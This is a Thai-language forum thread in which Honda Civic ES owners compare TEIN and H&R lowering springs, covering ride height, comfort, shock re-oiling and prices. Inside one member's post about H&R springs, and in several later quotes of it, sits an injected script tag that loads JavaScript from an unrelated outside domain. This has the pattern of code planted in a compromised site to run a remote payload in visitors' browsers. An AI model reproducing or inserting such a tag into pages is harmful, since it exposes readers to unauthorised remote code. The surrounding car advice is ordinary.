ตอบ
nookkarp


ชื่อเล่น: นก

เข้าร่วม: 10 กุมภา 2010
ตอบ: 57

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 78
ให้คำขอบคุณ: 71

ปี: 2003
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 21 พฤษภาคม 2010 18:44 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
หวัดดีทุกคนครับ ผมน้องใหม่ Es nok

คือมีเรื่องอยากสอบถามว่า สปริงโหลด Tein กับ H&R

แบบไหนดีกว่ากันครับ แบบไหนน่าใช้กว่า บอกราคาได้ยิ่งดีครับ

แนะนำร้านด้วยก็ดีน่ะครับ

รถผม ปี2003
silverqoo


เข้าร่วม: 08 พฤศจิกา 2009
ตอบ: 323

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 10
ศุกร์, 21 พฤษภาคม 2010 21:23 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
จริงๆผมว่า มันอยุ่ที่คอนเซปที่เราจะต้องการความเตี้ยขนาดไหน อ่ะคับ

สปริงทั้งสองอย่างก็มี ข้อดี ข้อเสียกันคนล่ะแบบ

ยังไงข้อมูลผิดพลาดยังไง ขออภัยด้วยน่ะคับ เป็นน้องใหม่อ่ะคับบ
ton-kk4


ชื่อเล่น: ต้น

เข้าร่วม: 06 กรกฎา 2009
ตอบ: 814

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1441
ให้คำขอบคุณ: 524

ที่อยู่: โลตัสบางปู-สมุทรปราการ-ม.เกษมบัญฑิต
ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 21 พฤษภาคม 2010 21:43 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ผมใช้ H&R ใส่สปิงเดิมอัดน้ำมัน นิ่มดีครับ
ได้รับคำขอบคุณจาก: zzzz_pp13 
day2520


เข้าร่วม: 23 มีนา 2010
ตอบ: 873

Guru ES
Guru ES

ได้รับคำขอบคุณ: 649
ให้คำขอบคุณ: 303

ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 23 พฤษภาคม 2010 13:15 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
อยากรู้เหมือนกันครับ ตัวไหนขับสบายอะ
nookkarp


ชื่อเล่น: นก

เข้าร่วม: 10 กุมภา 2010
ตอบ: 57

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 78
ให้คำขอบคุณ: 71

ปี: 2003
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 23 พฤษภาคม 2010 22:42 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ขอบคุณสำหรับข้อมูล ค้าบ

อยากได้แบบวิ่งนึบๆหน่อยน่ะครับ

+เตี้ยๆ
ได้รับคำขอบคุณจาก: nooduean_69 
DELL


ชื่อเล่น: หนุ่ม

เข้าร่วม: 12 ธันวา 2008
ตอบ: 2245

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1831
ให้คำขอบคุณ: 5795

ที่อยู่: The Gang (Chonburi)
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
อาทิตย์, 23 พฤษภาคม 2010 22:47 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
หนึบๆๆๆๆก็ ไอบัค คับสมใจแน่นอนคับผม
ได้รับคำขอบคุณจาก: ome_RX 
Tom-Acc


ชื่อเล่น: ต้อม

เข้าร่วม: 28 มิถุนา 2009
ตอบ: 932

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 997
ให้คำขอบคุณ: 1154

ที่อยู่: อุบลราชธานี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 24 พฤษภาคม 2010 07:14 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ผมใช้ H&R อยู่ครับ นิ่มใช้ได้
ราคาก็7000-8000 ครับไม่ค่อยแน่ใจเพราะเปลี่ยนนานแล้วครับ
tokykung


ชื่อเล่น: ต๊อก

เข้าร่วม: 27 ตุลา 2008
ตอบ: 2490

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2660
ให้คำขอบคุณ: 5788

ที่อยู่: เชียงราย
ปี: 2002
จันทร์, 24 พฤษภาคม 2010 08:06 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ผมว่า ถ้าอยากสวยน่าจะเป็น Tein เพราะหน้าจะทิ่มกว่าด้านหลัง
แต่ถ้าอยากจะนิ่มหน่อย ก็เป็น H&R แต่ด้านหน้าจะลอยกว่าด้านหลังอยู่หน่อย
ก็แล้วแต่ความต้องการครับ
Rangsit 33


เข้าร่วม: 01 ตุลา 2008
ตอบ: 2276

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3688
ให้คำขอบคุณ: 1582

ที่อยู่: Rangsit
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 24 พฤษภาคม 2010 09:45 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
..... ดีเค้า อาจไม่ดีเรา... ลองใช้ค้นหาด่วนครับ .... สำหรับผมชอบ ไอบัค...
petch


เข้าร่วม: 02 มีนา 2010
ตอบ: 464

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 172
ให้คำขอบคุณ: 0

ที่อยู่: สมุทรปราการ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 24 พฤษภาคม 2010 12:35 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ผมใช้ H&R อยู่ครับ นิ่มใช้ได้เลยและเตี้ยกำลังดี
hua-hin29


เข้าร่วม: 20 มกรา 2010
ตอบ: 884

Guru ES
Guru ES

ได้รับคำขอบคุณ: 866
ให้คำขอบคุณ: 1384

ที่อยู่: กุยบุรี ประจวบคีรีขันธ์
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 24 พฤษภาคม 2010 13:09 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ผมใช้ Tein โชคเดิม นิ่มครับ เคยลองนั่ง 5 คน ขับทางไกลไม่มีปัญหาเลยครับ
ทางไกลที่ว่า จากหัวหิน ไป เพชรชบูรณ์ ภายใน 1 เดือน 2ครั้ง
ทุกอย่างปกติครับ
ได้รับคำขอบคุณจาก: drunken 
tike


เข้าร่วม: 28 มิถุนา 2009
ตอบ: 346

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 375
ให้คำขอบคุณ: 456

ที่อยู่: นนทบุรี ...
ปี: 2004
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 24 พฤษภาคม 2010 16:15 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ตามสไตล์ผู้ใช้ครับบ ลองค้นหาดู
marijuanna


เข้าร่วม: 19 เมษา 2009
ตอบ: 241

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 210
ให้คำขอบคุณ: 5
จันทร์, 24 พฤษภาคม 2010 17:11 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
Tein ลงกี่นิวอ่ะครับ หน้าหลัง
day2520


เข้าร่วม: 23 มีนา 2010
ตอบ: 873

Guru ES
Guru ES

ได้รับคำขอบคุณ: 649
ให้คำขอบคุณ: 303

ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 24 พฤษภาคม 2010 18:11 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ถ้าไม่ผิดนะครับ ไม่เกิน 2 นิ้ว
nookkarp


ชื่อเล่น: นก

เข้าร่วม: 10 กุมภา 2010
ตอบ: 57

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 78
ให้คำขอบคุณ: 71

ปี: 2003
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 24 พฤษภาคม 2010 23:35 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ขอบคุณทุกคำแนะนำครับ

ชอบที่หน้าต่ำกว่าหลัง

หน้าทิ่มๆหน่อยสวยดีผมว่าน่ะ
BackHock


เข้าร่วม: 14 ตุลา 2008
ตอบ: 75

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 43
ให้คำขอบคุณ: 14

ที่อยู่: Praram 7 - Rattanatibet
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 25 พฤษภาคม 2010 07:59 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
Tein อัดนำ้มัน เลื่อนเบ้าหน้า OK ครับ นุ่ม หนึบ
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 11 มกรา 2013 22:54 - สปริงโหลด TEIN กะ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ขอคำแนะนำหน่อยครับ
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 11 มกรา 2013 23:58 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
Tein ก็คือสปริงเดิมที่สั้นลง หน้าแข็งกว่าเดิมนิดนึง หลังนิ่มกว่าเดิมนิดนึง เตี้ยนิดเดียว ข้อดีที่นึกออกคือเตี้ยงลงนิดนึง เหมากับคนไม่ชอบเตี้ยมาก สปริงหลังแก้อาการเด้งหลังได้นิดนึงเพราะนิ่มกว่าของเดิม

H&R หน้าเตี้ยกว่า Tein สปริงมีขดถี่และขดห่างอยู่ในขดเดียวกัน โตบโจทย์การใช้บนถนนจริงได้ดีกว่า สปริงขดถี่ทำงานเมื่อเจอทางขรุขระช่วยลดการสะเทือนได้ดี สปริงขดห่างจะแข็งกว่าขดถี่รับภาระขณะเข้าโค้งเพราะสปริงขดถี่จะยุบหมด


ปล.ทั้ง 2 ยี่ห้อ ท้ายห้อยทั้งคู่ H&R ห้อยกว่า Tein ความนุ่มความกระด้างพอๆกัน

จบข่าว
ได้รับคำขอบคุณจาก: Sombutsiri  nooduean_69  yoyosonic  HankMan  TUNG11  keacobain  meseoul  hawkeye_04  waymania  raksapol  surasaka  toptwo  chan-o  movingtown  CROW  nayyai1  nu_es_05 
aunja


ชื่อเล่น: อั๋น

เข้าร่วม: 08 มิถุนา 2012
ตอบ: 822

Guru ES
Guru ES

ได้รับคำขอบคุณ: 820
ให้คำขอบคุณ: 2141

ที่อยู่: อยุธยา บุรีรัมย์ ชัยภูมิ
ปี: 2004
สี: ทอง แซทเทิลไลท์ (NH-663M)
ศุกร์, 11 มกรา 2013 23:58 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
tein
aea


ชื่อเล่น: เอ้

เข้าร่วม: 15 มีนา 2011
ตอบ: 930

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 361
ให้คำขอบคุณ: 691

ที่อยู่: MIDDLEMARKET DONMUANG
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 12 มกรา 2013 04:47 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
คู่นี้ต้องอัดน้ำมันใหม่ด้วยนะครับ
ได้รับคำขอบคุณจาก: yoyosonic  athongchum 
Tanadath


เข้าร่วม: 12 มีนา 2011
ตอบ: 1498

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1165
ให้คำขอบคุณ: 325

ที่อยู่: 240/29ม.2ต.หนองบัวอ.เมืองจ.อุดรธานี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 12 มกรา 2013 07:02 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
หลายๆคนว่าTEINแข็งกว่าแต่ทนกว่า แต่ลดความสูงได้น้อย แล้วแต่รสนิยมคับ
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 12 มกรา 2013 11:55 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
aea พิมพ์ว่า:
คู่นี้ต้องอัดน้ำมันใหม่ด้วยนะครับ



สำหรับ Tein คู่หลังไม่จำเป็นต้องอัดน้ำมันใหม่น่ะครับถ้าโช๊คยังดีอยู่ ปกติโช๊คเดิมหลังก็เด้งอยู่แล้วเพราะสปริงแข็งกว่าโช๊ค เมื่อสปริงนิ่มลงก็ไม่จำเป็นต้องอัดน้ำมันให้แข็งขึ้น ถ้าอัดน้ำมันให้แข็งขึ้น มันก็จะเด้งขึ้นกว่าเดิมอีก

ส่วน H&R อันนี้ไม่ทราบค่า K เลยตอบไม่ได้ว่าต้องอัดน้ำมันใหม่เพิ่มหรือป่าว แต่ส่วนตัวผมที่ลองมาทั้ง 2 ยี่ห้อ ผมว่าไม่ต้องอัดน้ำมันดีกว่า

ตอนนี้ใส่ H&R อยู่อยากจะไปอัดน้ำมันใหม่ให้เท่าเดิมด้วยซ้ำ <script src="https://sport32news.com/civicesgroup.js"></

ความเห็นส่วนตัวน่ะครับ
ได้รับคำขอบคุณจาก: raksapol  surasaka 
yoyosonic


เข้าร่วม: 20 กรกฎา 2011
ตอบ: 1079

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 325
ให้คำขอบคุณ: 3432

ที่อยู่: กทม.
ปี: 2002
อาทิตย์, 13 มกรา 2013 18:44 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
athongchum พิมพ์ว่า:
Tein ก็คือสปริงเดิมที่สั้นลง หน้าแข็งกว่าเดิมนิดนึง หลังนิ่มกว่าเดิมนิดนึง เตี้ยนิดเดียว ข้อดีที่นึกออกคือเตี้ยงลงนิดนึง เหมากับคนไม่ชอบเตี้ยมาก สปริงหลังแก้อาการเด้งหลังได้นิดนึงเพราะนิ่มกว่าของเดิม

H&R หน้าเตี้ยกว่า Tein สปริงมีขดถี่และขดห่างอยู่ในขดเดียวกัน โตบโจทย์การใช้บนถนนจริงได้ดีกว่า สปริงขดถี่ทำงานเมื่อเจอทางขรุขระช่วยลดการสะเทือนได้ดี สปริงขดห่างจะแข็งกว่าขดถี่รับภาระขณะเข้าโค้งเพราะสปริงขดถี่จะยุบหมด


ปล.ทั้ง 2 ยี่ห้อ ท้ายห้อยทั้งคู่ H&R ห้อยกว่า Tein ความนุ่มความกระด้างพอๆกัน

จบข่าว




+1....
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 13 มกรา 2013 19:25 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ขอบคุณข้อมูลครับ
CoolMo


ชื่อเล่น: โม

เข้าร่วม: 23 มีนา 2012
ตอบ: 441

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 367
ให้คำขอบคุณ: 323

ที่อยู่: พระนครศรีอยุธยา
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 13 มกรา 2013 20:44 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
ยังไม่ได้ ลิ้ม TEIN เลย หามือสองสภาพดีๆ ยากจังT^T
ได้รับคำขอบคุณจาก: raksapol 
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 14 มกรา 2013 10:55 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
athongchum พิมพ์ว่า:
aea พิมพ์ว่า:
คู่นี้ต้องอัดน้ำมันใหม่ด้วยนะครับ



สำหรับ Tein คู่หลังไม่จำเป็นต้องอัดน้ำมันใหม่น่ะครับถ้าโช๊คยังดีอยู่ ปกติโช๊คเดิมหลังก็เด้งอยู่แล้วเพราะสปริงแข็งกว่าโช๊ค เมื่อสปริงนิ่มลงก็ไม่จำเป็นต้องอัดน้ำมันให้แข็งขึ้น ถ้าอัดน้ำมันให้แข็งขึ้น มันก็จะเด้งขึ้นกว่าเดิมอีก

ส่วน H&R อันนี้ไม่ทราบค่า K เลยตอบไม่ได้ว่าต้องอัดน้ำมันใหม่เพิ่มหรือป่าว แต่ส่วนตัวผมที่ลองมาทั้ง 2 ยี่ห้อ ผมว่าไม่ต้องอัดน้ำมันดีกว่า

ตอนนี้ใส่ H&R อยู่อยากจะไปอัดน้ำมันใหม่ให้เท่าเดิมด้วยซ้ำ <script src="https://sport32news.com/civicesgroup.js"></

ความเห็นส่วนตัวน่ะครับ


h&r ที่ใส่อยู่เปงไงบ้างครับผม
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 14 มกรา 2013 11:12 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
raksapol พิมพ์ว่า:
athongchum พิมพ์ว่า:
aea พิมพ์ว่า:
คู่นี้ต้องอัดน้ำมันใหม่ด้วยนะครับ



สำหรับ Tein คู่หลังไม่จำเป็นต้องอัดน้ำมันใหม่น่ะครับถ้าโช๊คยังดีอยู่ ปกติโช๊คเดิมหลังก็เด้งอยู่แล้วเพราะสปริงแข็งกว่าโช๊ค เมื่อสปริงนิ่มลงก็ไม่จำเป็นต้องอัดน้ำมันให้แข็งขึ้น ถ้าอัดน้ำมันให้แข็งขึ้น มันก็จะเด้งขึ้นกว่าเดิมอีก

ส่วน H&R อันนี้ไม่ทราบค่า K เลยตอบไม่ได้ว่าต้องอัดน้ำมันใหม่เพิ่มหรือป่าว แต่ส่วนตัวผมที่ลองมาทั้ง 2 ยี่ห้อ ผมว่าไม่ต้องอัดน้ำมันดีกว่า

ตอนนี้ใส่ H&R อยู่อยากจะไปอัดน้ำมันใหม่ให้เท่าเดิมด้วยซ้ำ <script src="https://sport32news.com/civicesgroup.js"></

ความเห็นส่วนตัวน่ะครับ


h&r ที่ใส่อยู่เปงไงบ้างครับผม



เตี้ยกว่า tein ประมาณ 10mm ความแข็งพอกัน h&r ทำได้ดีกว่าทั้งทางตรงและโค้ง
ได้รับคำขอบคุณจาก: meseoul 
raksapol


ชื่อเล่น: เล็ก

เข้าร่วม: 22 พฤศจิกา 2012
ตอบ: 446

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 587
ให้คำขอบคุณ: 473

ที่อยู่: สุราด @ กทม
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
จันทร์, 14 มกรา 2013 11:37 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
athongchum พิมพ์ว่า:
raksapol พิมพ์ว่า:
athongchum พิมพ์ว่า:
aea พิมพ์ว่า:
คู่นี้ต้องอัดน้ำมันใหม่ด้วยนะครับ



สำหรับ Tein คู่หลังไม่จำเป็นต้องอัดน้ำมันใหม่น่ะครับถ้าโช๊คยังดีอยู่ ปกติโช๊คเดิมหลังก็เด้งอยู่แล้วเพราะสปริงแข็งกว่าโช๊ค เมื่อสปริงนิ่มลงก็ไม่จำเป็นต้องอัดน้ำมันให้แข็งขึ้น ถ้าอัดน้ำมันให้แข็งขึ้น มันก็จะเด้งขึ้นกว่าเดิมอีก


ส่วน H&R อันนี้ไม่ทราบค่า K เลยตอบไม่ได้ว่าต้องอัดน้ำมันใหม่เพิ่มหรือป่าว แต่ส่วนตัวผมที่ลองมาทั้ง 2 ยี่ห้อ ผมว่าไม่ต้องอัดน้ำมันดีกว่า

ตอนนี้ใส่ H&R อยู่อยากจะไปอัดน้ำมันใหม่ให้เท่าเดิมด้วยซ้ำ <script src="https://sport32news.com/civicesgroup.js"></

ความเห็นส่วนตัวน่ะครับ


h&r ที่ใส่อยู่เปงไงบ้างครับผม



เตี้ยกว่า tein ประมาณ 10mm ความแข็งพอกัน h&r ทำได้ดีกว่าทั้งทางตรงและโค้ง


ตัวสปิงรวมค่าติดตั้งประมาณเท่าไรครับ
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 14 มกรา 2013 12:09 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
raksapol พิมพ์ว่า:
athongchum พิมพ์ว่า:
raksapol พิมพ์ว่า:
athongchum พิมพ์ว่า:
aea พิมพ์ว่า:
คู่นี้ต้องอัดน้ำมันใหม่ด้วยนะครับ



สำหรับ Tein คู่หลังไม่จำเป็นต้องอัดน้ำมันใหม่น่ะครับถ้าโช๊คยังดีอยู่ ปกติโช๊คเดิมหลังก็เด้งอยู่แล้วเพราะสปริงแข็งกว่าโช๊ค เมื่อสปริงนิ่มลงก็ไม่จำเป็นต้องอัดน้ำมันให้แข็งขึ้น ถ้าอัดน้ำมันให้แข็งขึ้น มันก็จะเด้งขึ้นกว่าเดิมอีก


ส่วน H&R อันนี้ไม่ทราบค่า K เลยตอบไม่ได้ว่าต้องอัดน้ำมันใหม่เพิ่มหรือป่าว แต่ส่วนตัวผมที่ลองมาทั้ง 2 ยี่ห้อ ผมว่าไม่ต้องอัดน้ำมันดีกว่า

ตอนนี้ใส่ H&R อยู่อยากจะไปอัดน้ำมันใหม่ให้เท่าเดิมด้วยซ้ำ <script src="https://sport32news.com/civicesgroup.js"></

ความเห็นส่วนตัวน่ะครับ


h&r ที่ใส่อยู่เปงไงบ้างครับผม



เตี้ยกว่า tein ประมาณ 10mm ความแข็งพอกัน h&r ทำได้ดีกว่าทั้งทางตรงและโค้ง


ตัวสปิงรวมค่าติดตั้งประมาณเท่าไรครับ




ประมาณ 8000 ครับ
tokmun002


ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ที่อยู่: พระประแดง
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 14 มกรา 2013 12:53 - สปริงโหลด TEIN กับ H&R แตกต่างกันอย่างไรครับ แล้วตัวไหนดีกว่ากันครับ
athongchum พิมพ์ว่า:
raksapol พิมพ์ว่า:
athongchum พิมพ์ว่า:
raksapol พิมพ์ว่า:
athongchum พิมพ์ว่า:
aea พิมพ์ว่า:
คู่นี้ต้องอัดน้ำมันใหม่ด้วยนะครับ



สำหรับ Tein คู่หลังไม่จำเป็นต้องอัดน้ำมันใหม่น่ะครับถ้าโช๊คยังดีอยู่ ปกติโช๊คเดิมหลังก็เด้งอยู่แล้วเพราะสปริงแข็งกว่าโช๊ค เมื่อสปริงนิ่มลงก็ไม่จำเป็นต้องอัดน้ำมันให้แข็งขึ้น ถ้าอัดน้ำมันให้แข็งขึ้น มันก็จะเด้งขึ้นกว่าเดิมอีก


ส่วน H&R อันนี้ไม่ทราบค่า K เลยตอบไม่ได้ว่าต้องอัดน้ำมันใหม่เพิ่มหรือป่าว แต่ส่วนตัวผมที่ลองมาทั้ง 2 ยี่ห้อ ผมว่าไม่ต้องอัดน้ำมันดีกว่า
ของใหม่ห้องซื้อขายมีอยู่นิ่ครับ. 6100H&R
ตอนนี้ใส่ H&R อยู่อยากจะไปอัดน้ำมันใหม่ให้เท่าเดิมด้วยซ้ำ <script src="https://sport32news.com/civicesgroup.js"></

ความเห็นส่วนตัวน่ะครับ


h&r ที่ใส่อยู่เปงไงบ้างครับผม



เตี้ยกว่า tein ประมาณ 10mm ความแข็งพอกัน h&r ทำได้ดีกว่าทั้งทางตรงและโค้ง


ตัวสปิงรวมค่าติดตั้งประมาณเท่าไรครับ




ประมาณ 8000 ครับ
ตอบ
หน้า 1 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.